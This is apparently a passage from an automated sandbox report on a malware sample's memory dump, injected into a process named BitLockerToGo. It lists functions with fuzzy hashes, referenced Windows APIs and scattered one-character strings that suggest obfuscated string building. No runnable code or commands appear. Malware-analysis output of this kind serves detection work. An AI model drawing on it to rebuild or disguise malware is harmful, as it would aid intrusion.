
Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: x
API String ID: 0-2363233923
Opcode ID: a1d5d6269ed7a575790202bb59028525cb31f7084a32bb2cc3fdf6debd88dd43
Instruction ID: ffbefdd5053de22eca830da18c1ff1a4bac70acdea3187adfd2737510a53603e
Opcode Fuzzy Hash: a1d5d6269ed7a575790202bb59028525cb31f7084a32bb2cc3fdf6debd88dd43
Instruction Fuzzy Hash: D6913B7150C3909FD321DF24849476BBBE0AF99308F58991DE0CDEB242EB38DA49DB56

Function 00E315DB Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

G@AB, xrefs: 00E31672

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: G@AB
API String ID: 0-648899744
Opcode ID: cf5dbdae7234c087d45dab28947a398d0f596ceeb6d702d3de2a9ef186428697
Instruction ID: f6571a1902dcf452064609e068ff3583fc40275ec13cf6939bc0faaddcd58620
Opcode Fuzzy Hash: cf5dbdae7234c087d45dab28947a398d0f596ceeb6d702d3de2a9ef186428697
Instruction Fuzzy Hash: C7210872A0C3508BC324CF18CC89BABBBE1ABC9308F19C6ACD4C867255D7749949CBC5

Function 00E5F330 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297bd9c37fb1c3df51305c68ea61d00763ab059cf1a6df0f4b9bba561758ae7d
Instruction ID: 7084a41bed9b60c10cd4f202dcf3b90f6bed3b3197444c5de82c2f818c871189
Opcode Fuzzy Hash: 297bd9c37fb1c3df51305c68ea61d00763ab059cf1a6df0f4b9bba561758ae7d
Instruction Fuzzy Hash: DCC1C072A08241CFC708DF29E89066FB7E1FB89355F1A896DD5C9A7351C3B49888CB81

Function 00E4BCB6 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b64c33f3ad646d39d0eff7be4bf01f12b87008ce052b6a5aa062b0ea7daacec2
Instruction ID: c18e3193ae7ad2fc0a45bd8b55a05aed2c2bb903a6a4b678970d4bc8a4c4d3f4
Opcode Fuzzy Hash: b64c33f3ad646d39d0eff7be4bf01f12b87008ce052b6a5aa062b0ea7daacec2
Instruction Fuzzy Hash: 29912B34605B818BC3258B399490376FBF2BF96345F28569ED4EB9B786D334E805CB11

Function 00E5BDC0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0878b94558ccea0565aab75dd7ce2ae214e2d868b8f6ec2f19d4a7ddc7f5bd81
Instruction ID: 378d6d6b0ac7f320e71619b4c372a94ebd56369ab762bb1b4f401a10872987ab
Opcode Fuzzy Hash: 0878b94558ccea0565aab75dd7ce2ae214e2d868b8f6ec2f19d4a7ddc7f5bd81
Instruction Fuzzy Hash: 5361037AA082119FD314DF29EC8063AB3E2FBC4755F199D2CEAC897354D7309C049B91

Function 00E424AB Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ef190a53a8b4423fd018557accbf3517f03c79af00cd6c22535514a784d912
Instruction ID: d13126b7b5b488664aca778b0c8d5a658280d3c963610a3fd41a0760aa4a6568
Opcode Fuzzy Hash: 14ef190a53a8b4423fd018557accbf3517f03c79af00cd6c22535514a784d912
Instruction Fuzzy Hash: 08611F72600701CFD728CF15E4906A3B7E2EFC5315F299AAED18A4B785D739E842CB84

Function 00E458D0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee4150b9d9da8941dac24af1687917208dc26c1707e0e1c74664352657c5b062
Instruction ID: 1600e4f13d6a4fef5a284e9a27cd190fa466bf03526a25115119ad01ca9f8ac9
Opcode Fuzzy Hash: ee4150b9d9da8941dac24af1687917208dc26c1707e0e1c74664352657c5b062
Instruction Fuzzy Hash: 6C51C6766187118FC718CF28D89062AB7E2FFC9314F198A2DD49997396DB34EC02CB91

Function 00E3A0E0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09269928d4f80cf2c0cccf5747b78aa665de81f765be875f2fc14506b7bf532
Instruction ID: 285796a18a425e56d44c8c2059fac8b9fbdd65239fa0ff2f1dce3aea2fa90fc8
Opcode Fuzzy Hash: b09269928d4f80cf2c0cccf5747b78aa665de81f765be875f2fc14506b7bf532
Instruction Fuzzy Hash: AD511476A00B019FD324CF29DC41A53BBF6FB88310F048A2CE46A97391DB70E804CB91

Function 00E43772 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d92798f4fb675392d144633ce5032bb9371190326b8418e9682d7ce4a803b59d
Instruction ID: cabd3f970b716701b73544127ed7fc6252cb48cbd0d6abd545a789e6b7dc2e08
Opcode Fuzzy Hash: d92798f4fb675392d144633ce5032bb9371190326b8418e9682d7ce4a803b59d
Instruction Fuzzy Hash: BE51F7B6A042218BD714DF28EC40A2AB3E2FF98344F66592CD6C4A7354D774EE15CBD1

Function 00E462F1 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69c2eca8fdcc08edd50666a349fc26856d1caff4d755c65a96da969b4b6c3a34
Instruction ID: bdae19b4b564457608cad4f26a3a5131b450e896dbcceb6dc4b30bff2b11812d
Opcode Fuzzy Hash: 69c2eca8fdcc08edd50666a349fc26856d1caff4d755c65a96da969b4b6c3a34
Instruction Fuzzy Hash: 9F51FE755083218BC320CF18D8117ABB3F1FFC5758F099A1DE885AB394EB789945CB92

Function 00E5FB16 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e097bfb48f1e28c6d0715d3181c5a24e82dc0ed2b56d4bec05d58e1f95e22dc6
Instruction ID: 8dbe5074fac67309a86ed2633f6c9b0400d22445b9b6a492eb0f4e0de2113f56
Opcode Fuzzy Hash: e097bfb48f1e28c6d0715d3181c5a24e82dc0ed2b56d4bec05d58e1f95e22dc6
Instruction Fuzzy Hash: D93193B5704A008FC328CF2ED841666B7F2FB89321B14856DE89ACB791DB34E905CB41

Function 00E22DF0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24dbb7143b9ee6d028cf2683c4161528ea33162efe7fa5ec9d17086944ca7a7c
Instruction ID: 4f9a3237267a3267c5c39c31372f1f02fc5c4172efb28d11f7b1afc32639e634
Opcode Fuzzy Hash: 24dbb7143b9ee6d028cf2683c4161528ea33162efe7fa5ec9d17086944ca7a7c
Instruction Fuzzy Hash: 3E31DE31604220ABD7159F28E880A3BB7E1EF85358F15992CE99AEB351D731DC53D741

Function 00E32350 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fa6f6629b40fd23fc08205d2f32e8264e34e7e54e1c638ee1e3f98b4d0c0177
Instruction ID: 1dcc9989fb8ef58881564e51531287e41b24613b04a04768063c28dd11da8538
Opcode Fuzzy Hash: 4fa6f6629b40fd23fc08205d2f32e8264e34e7e54e1c638ee1e3f98b4d0c0177
Instruction Fuzzy Hash: DC21D6715083518BD715DE24D88477EBBE4BF89314F14282CE1CAB3281E778E945C796

Function 00E32B50 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de18ee7e72b13fbd575ed955cc94710b65043361afd3ba80c35a19f5f07704a4
Instruction ID: 307d6e8211bfca1e4a8655ee9e96b48a01a06cb539d78722cb6bde2552ccede7
Opcode Fuzzy Hash: de18ee7e72b13fbd575ed955cc94710b65043361afd3ba80c35a19f5f07704a4
Instruction Fuzzy Hash: D721BEB29083509BD725CE24C88877EFBE4AF99318F14291CE1CAB7241E774D941C786

Function 00E55060 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: e382d7fa9fe9f0db383224a9ed0a2f45c32d78b6a038c3307d76ffa9c1f5a1fa
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 751100336055D40EC3158D3C94605A57F930AD3335F6D9799F8B4AB2D2D523CD8E8395

Function 00E47840 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c12b3212de88500b25136366eeca3d4137ff95d19a8ae342a22570753d484b8b
Instruction ID: f6ef68225f4731deba0996e3155c3a8bacb9f4f1fcf5746b858a2b92a78f7dfe
Opcode Fuzzy Hash: c12b3212de88500b25136366eeca3d4137ff95d19a8ae342a22570753d484b8b
Instruction Fuzzy Hash: DA01B1F1B0532147EB249E55BAC5727B3E9AF88718F08243CE98967602EB71EC04C2E1

Function 00E23B80 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c9c1594776fe8453ce095e8575cc9c95d6961b1bba55b063943fbb25ce74f6
Instruction ID: 6ebd0593924ffa57ebf6d6ece2bf6a2949bcb415331ede880febd0e50da06d87
Opcode Fuzzy Hash: c0c9c1594776fe8453ce095e8575cc9c95d6961b1bba55b063943fbb25ce74f6
Instruction Fuzzy Hash: 24F0903AB255314B9714CE3EBC04467B3A1ABC6734B196628E892F3285DA30EE019680

Function 00E46A7A Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d36e46844b77104c844b0e18a54a10ec6830148e886e7a257afbe21d2a76b08
Instruction ID: 300b8e63312aee8aaae995afca6c00200ea63efd65cb282b86ee206bc6bc7a53
Opcode Fuzzy Hash: 1d36e46844b77104c844b0e18a54a10ec6830148e886e7a257afbe21d2a76b08
Instruction Fuzzy Hash: 21F082B6C05215AFF7106F20BC02B2B77EDEB46354F041C65F9A473252E671F9148B92

Function 00E5A530 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: efdbe279ed2b193d84badbba88c47336a90257862279e3190ba7521db345c241
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: B2D05B21508221469B648D199400977F7F0E987712B49556EF985E3144E234DC45C169

Function 00E2C53A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b157b29321d82e53272fcc2439e938c7c79e7698d5833b04466b0d29b8caf3
Instruction ID: a54732695a3235152b8f3b172862bcdcc6ec0ff96d44082bf4ab6bcaecc0a7f2
Opcode Fuzzy Hash: a3b157b29321d82e53272fcc2439e938c7c79e7698d5833b04466b0d29b8caf3
Instruction Fuzzy Hash: AFF0E378652A11CFC759CF24D0A0922B7B2FF8A748720249CD6529BBA4DB32B846CF44

Function 00E4DB13 Relevance: 79.0, APIs: 1, Strings: 44, Instructions: 220memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00E4DBFC

Strings

a, xrefs: 00E4DCA8
', xrefs: 00E4DCDF
o, xrefs: 00E4DCB2
E, xrefs: 00E4DD67
O, xrefs: 00E4DD97
w, xrefs: 00E4DCDA
|, xrefs: 00E4DC67
;, xrefs: 00E4DCA3
s, xrefs: 00E4DCF7
[, xrefs: 00E4DC3F
c, xrefs: 00E4DC9E
k, xrefs: 00E4DCC6
G, xrefs: 00E4DC21
S, xrefs: 00E4DC17
m, xrefs: 00E4DCBC
0, xrefs: 00E4DF0F
N, xrefs: 00E4DC49
y, xrefs: 00E4DD47
}, xrefs: 00E4DD27
c, xrefs: 00E4DB36
I, xrefs: 00E4DDC7
u, xrefs: 00E4DCE7
A, xrefs: 00E4DD87
e, xrefs: 00E4DC94
W, xrefs: 00E4DDD7
K, xrefs: 00E4DDB7
\, xrefs: 00E4DC2B
p, xrefs: 00E4DC53
V, xrefs: 00E4DDCF
F, xrefs: 00E4DC7B
o, xrefs: 00E4DB26
q, xrefs: 00E4DD07
C, xrefs: 00E4DD77
{, xrefs: 00E4DD37
g, xrefs: 00E4DC8A
h, xrefs: 00E4DC5D
G, xrefs: 00E4DD57
[, xrefs: 00E4DC35
f, xrefs: 00E4DB46
5, xrefs: 00E4DC85
i, xrefs: 00E4DCD0
M, xrefs: 00E4DDA7
P, xrefs: 00E4DC71
1, xrefs: 00E4DC8F

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: '$0$1$5$;$A$C$E$F$G$G$I$K$M$N$O$P$S$V$W$[$[$\$a$c$c$e$f$g$h$i$k$m$o$o$p$q$s$u$w$y${$|$}
API String ID: 2525500382-2055658641
Opcode ID: f12f40293512df59b3b359d20d7774e0679f610872600c99c74736cc7d784bc8
Instruction ID: 6bc88bf06135bd895682ed341e075f7e962f0f496b6be7bd79b4be39ae4c7b90
Opcode Fuzzy Hash: f12f40293512df59b3b359d20d7774e0679f610872600c99c74736cc7d784bc8
Instruction Fuzzy Hash: A0B11C7150CBC18ED336C63C884879FBED15BE2318F188A9DD4E98B392D6B94549CB63

Function 00E4E7B0 Relevance: 79.0, APIs: 1, Strings: 44, Instructions: 220memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00E4E891

Strings

s, xrefs: 00E4E98C
0, xrefs: 00E4EBA4
V, xrefs: 00E4EA64
F, xrefs: 00E4E910
e, xrefs: 00E4E929
c, xrefs: 00E4E7CB
m, xrefs: 00E4E951
', xrefs: 00E4E974
K, xrefs: 00E4EA4C
;, xrefs: 00E4E938
1, xrefs: 00E4E924
u, xrefs: 00E4E97C
I, xrefs: 00E4EA5C
g, xrefs: 00E4E91F
W, xrefs: 00E4EA6C
q, xrefs: 00E4E99C
{, xrefs: 00E4E9CC
a, xrefs: 00E4E93D
S, xrefs: 00E4E8AC
}, xrefs: 00E4E9BC
5, xrefs: 00E4E91A
o, xrefs: 00E4E947
y, xrefs: 00E4E9DC
O, xrefs: 00E4EA2C
P, xrefs: 00E4E906
N, xrefs: 00E4E8DE
C, xrefs: 00E4EA0C
w, xrefs: 00E4E96F
[, xrefs: 00E4E8CA
o, xrefs: 00E4E7BB
i, xrefs: 00E4E965
A, xrefs: 00E4EA1C
c, xrefs: 00E4E933
\, xrefs: 00E4E8C0
k, xrefs: 00E4E95B
|, xrefs: 00E4E8FC
E, xrefs: 00E4E9FC
h, xrefs: 00E4E8F2
[, xrefs: 00E4E8D4
f, xrefs: 00E4E7DB
G, xrefs: 00E4E8B6
G, xrefs: 00E4E9EC
M, xrefs: 00E4EA3C
p, xrefs: 00E4E8E8

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: '$0$1$5$;$A$C$E$F$G$G$I$K$M$N$O$P$S$V$W$[$[$\$a$c$c$e$f$g$h$i$k$m$o$o$p$q$s$u$w$y${$|$}
API String ID: 2525500382-2055658641
Opcode ID: 46e2556daa8767a7cfcfca561baf3799c79fff24bec20dbc6331345c2bbd62de
Instruction ID: 643d4bcce8cc1bc3a191ad96a1c4fb91c54f08b3a875cb4ce9de0a964c7ef6b8
Opcode Fuzzy Hash: 46e2556daa8767a7cfcfca561baf3799c79fff24bec20dbc6331345c2bbd62de
Instruction Fuzzy Hash: CFB13B7150CBC18EE335C638844839FBED16BE2318F188A9DD4E98B392D6B94449CB63

Function 00E4E024 Relevance: 36.9, APIs: 2, Strings: 19, Instructions: 162COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E4E02E
VariantInit.OLEAUT32 ref: 00E4E041

Strings

E, xrefs: 00E4E0EB
%, xrefs: 00E4E0C3
U, xrefs: 00E4E06B
K, xrefs: 00E4E07B
C, xrefs: 00E4E0BB
*, xrefs: 00E4E063
O, xrefs: 00E4E09B
I, xrefs: 00E4E08B
}, xrefs: 00E4E12B
/, xrefs: 00E4E083
/, xrefs: 00E4E093
M, xrefs: 00E4E0AB
{, xrefs: 00E4E0FB
A, xrefs: 00E4E0CB
G, xrefs: 00E4E0DB
s, xrefs: 00E4E13B
0, xrefs: 00E4E0F3
y, xrefs: 00E4E10B
|, xrefs: 00E4E133

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: %$*$/$/$0$A$C$E$G$I$K$M$O$U$s$y${$|$}
API String ID: 2610073882-1133498426
Opcode ID: be8e905a1fb9138248994e04b222aeef2ba47b1fc0368cfed8fe233645ba4d17
Instruction ID: 21c29fc21ca26677ad10ab3109da559f66d46c8e366f16f5654401c6c9d6f598
Opcode Fuzzy Hash: be8e905a1fb9138248994e04b222aeef2ba47b1fc0368cfed8fe233645ba4d17
Instruction Fuzzy Hash: 2F71767164D7C08AE334DB38D8997DABAE16BD9314F08596DD0DCC7382DBBA88058B53

Function 00E4D855 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 149COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E4D867
VariantInit.OLEAUT32 ref: 00E4D87A

Strings

), xrefs: 00E4D901
!, xrefs: 00E4D941
3, xrefs: 00E4D8B1
', xrefs: 00E4D911
1, xrefs: 00E4D8C1
%, xrefs: 00E4D921
-, xrefs: 00E4D8E1
#, xrefs: 00E4D931
+, xrefs: 00E4D8F1
/, xrefs: 00E4D8D1
5, xrefs: 00E4D8A1

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$1$3$5
API String ID: 2610073882-1171173986
Opcode ID: f3741e495d8ec1e0546827462bd220d9071d33b5460d5874d06d661fdcd7f822
Instruction ID: 5ed9dcd8fabdca643228559692fe98d841fa1f803b0be95cea703a4b2bcfa66a
Opcode Fuzzy Hash: f3741e495d8ec1e0546827462bd220d9071d33b5460d5874d06d661fdcd7f822
Instruction Fuzzy Hash: 8A61493260D7C18AD335CB28985979BFBD26BE6328F185A6DD0E88B3D2CB754406C753

Function 00E4CC09 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 149COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E4CC13
VariantInit.OLEAUT32 ref: 00E4CC26

Strings

1, xrefs: 00E4CC6D
!, xrefs: 00E4CCED
5, xrefs: 00E4CC4D
/, xrefs: 00E4CC7D
-, xrefs: 00E4CC8D
), xrefs: 00E4CCAD
#, xrefs: 00E4CCDD
3, xrefs: 00E4CC5D
+, xrefs: 00E4CC9D
', xrefs: 00E4CCBD
%, xrefs: 00E4CCCD

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$1$3$5
API String ID: 2610073882-1171173986
Opcode ID: 6d3ff7e66659f1207f41192c3d92d9f7a6f946664ae061c922423e74b2e512a1
Instruction ID: 7e32d5ef449c2b81759e56f6c298bf3b05d84f5ad79fbb70be0ea37065d51c3e
Opcode Fuzzy Hash: 6d3ff7e66659f1207f41192c3d92d9f7a6f946664ae061c922423e74b2e512a1
Instruction Fuzzy Hash: E361473260D7C18ED335CB28885979BFAD26BD6328F188A6DD4E98B3D2CB754406C753

Function 00E4D596 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 108COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E4D5A0
VariantInit.OLEAUT32 ref: 00E4D5B3

Strings

F, xrefs: 00E4D625
X, xrefs: 00E4D635
L, xrefs: 00E4D5E5
F, xrefs: 00E4D665
G, xrefs: 00E4D5F5
Z, xrefs: 00E4D605
a, xrefs: 00E4D5D5
Y, xrefs: 00E4D675
i, xrefs: 00E4D655
q, xrefs: 00E4D615
r, xrefs: 00E4D645

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: F$F$G$L$X$Y$Z$a$i$q$r
API String ID: 2610073882-4077553885
Opcode ID: 4475731d0ac12cf9d3a03ed6b1e3aa5bd3d7fc3a111484dc649f17d614a7fcac
Instruction ID: 4faef6de7d683babcd0689ea34de6951592677e3bb86094da2ea3bf52cc08b85
Opcode Fuzzy Hash: 4475731d0ac12cf9d3a03ed6b1e3aa5bd3d7fc3a111484dc649f17d614a7fcac
Instruction Fuzzy Hash: 5651147060D7C18EE335DB2898583DFBBE16BD6324F084A5DD1EC9B292DA754105CB63

Function 00E4EBF9 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00E4EC03

Strings

u, xrefs: 00E4EC83
{, xrefs: 00E4EC33
q, xrefs: 00E4EC63
s, xrefs: 00E4EC73
w, xrefs: 00E4EC93
}, xrefs: 00E4EC43
y, xrefs: 00E4EC23
t, xrefs: 00E4EC8B
#, xrefs: 00E4EC1B

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: #$q$s$t$u$w$y${$}
API String ID: 1927566239-644069722
Opcode ID: 49cdb35fc79fa4fe9b09ccd2fb300c3c9354133d97f1f9141e21ff33261856e2
Instruction ID: f9967c8fb052e3563eca0a646687e510c3ccfd26deaf69eb70635e4af699d33f
Opcode Fuzzy Hash: 49cdb35fc79fa4fe9b09ccd2fb300c3c9354133d97f1f9141e21ff33261856e2
Instruction Fuzzy Hash: 43418A2160C7C18AE3359BB8D85939FBFE16BD2314F085E6ED0D867392C6798145C763

Function 00E4EE5A Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00E4EE6C

Strings

w, xrefs: 00E4EEFC
{, xrefs: 00E4EE9C
s, xrefs: 00E4EEDC
q, xrefs: 00E4EECC
#, xrefs: 00E4EE84
t, xrefs: 00E4EEF4
y, xrefs: 00E4EE8C
u, xrefs: 00E4EEEC
}, xrefs: 00E4EEAC

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e20000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: #$q$s$t$u$w$y${$}
API String ID: 1927566239-644069722
Opcode ID: cf2205aa350d2bddaff641c6af98cf1bf43e43eaa824ffb12f638eea07123589
Instruction ID: 04a4ebb6e46dadf50dd3a924b6bc64a5b40267864985bfe9c3552ead9cb06316
Opcode Fuzzy Hash: cf2205aa350d2bddaff641c6af98cf1bf43e43eaa824ffb12f638eea07123589
Instruction Fuzzy Hash: 53417C6160C7C18AD3359BB8D45439FBFE16BE2314F085E6EE0D86B392C6794649C723

Function 00E526DB Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00E5277A
GetSystemMetrics.USER32 ref: 00E5278B
DeleteObject.GDI32 ref: 00E527F3
SelectObject.GDI32 ref: 00E5284D
SelectObject.GDI32 ref: 00E528DB
DeleteObject.GDI32 ref: 00E52918

Strings

, xrefs: 00E528A8

Memory Dump Source

Source File: 00000009.00000002.3028459938.0000000000E20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true

Joe Sandbox IDA Plugin

